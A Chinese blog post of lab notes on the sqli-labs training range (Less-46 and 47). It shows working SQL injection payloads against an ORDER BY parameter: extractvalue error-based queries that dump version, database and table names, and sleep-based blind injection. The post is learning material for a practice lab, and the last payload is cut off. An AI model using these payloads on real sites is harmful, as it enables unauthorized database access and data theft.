sqli-labs靶场笔记(七)

本文记录了在sqli-labs靶场中的实战经历,涉及Less-46到Less-65关卡,涵盖报错注入、时间盲注、order by注入、堆叠注入和联合注入等技术。通过不同方法如法一、法二展示攻击手段,部分关卡利用into outfile获取数据。虽然在真实机上遇到提交问题,但在Kali Docker环境中顺利进行。
摘要由CSDN通过智能技术生成

sqli-labs靶场笔记(七)

Less-46【报错注入|order by 注入:into outfile】

观察页面发现:输入的sort值为排序的值,通常前缀为order by
观察代码发现,确实如此
在这里插入图片描述判断是否存在注入:【返回不一样,存在注入】
在这里插入图片描述
在这里插入图片描述

尝试获取属性列数目,确定为3,使用4则报错
在这里插入图片描述

法一:【报错注入】

下面展示 payload

sort=4 and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security')))%23

在这里插入图片描述

法二:【时间盲注】

下面展示payload

sort=if(ascii(substr((select database()),1,1))=114,1,sleep(4))%23

若猜测成功,则返回正常页面;否则:
在这里插入图片描述
使用burp将database()跑出来需要的时间较长
在这里插入图片描述

into outfile

在这里插入图片描述

Less-47【'注入|时间盲注|报错注入|order by 注入:into outfile】

判断存在注入
在这里插入图片描述

法一:【报错注入】

下面展示 payload

sort=1' and extractvalue(1,concat(0x7e,(select version())))%23	//爆版本
sort=1' and extractvalue(1,concat(0x7e,(select database())))%23	//爆库
sort=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security')))%23	//爆表

在这里插入图片描述

法二:【时间盲注】

这里的payload相对于Less-46的时间盲注有点改变,采用burp速度相对更快些
下面展示 payload

sort=1' and if(ascii(substr((select%20database()),1,1))=113,sleep(5),1) %2
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值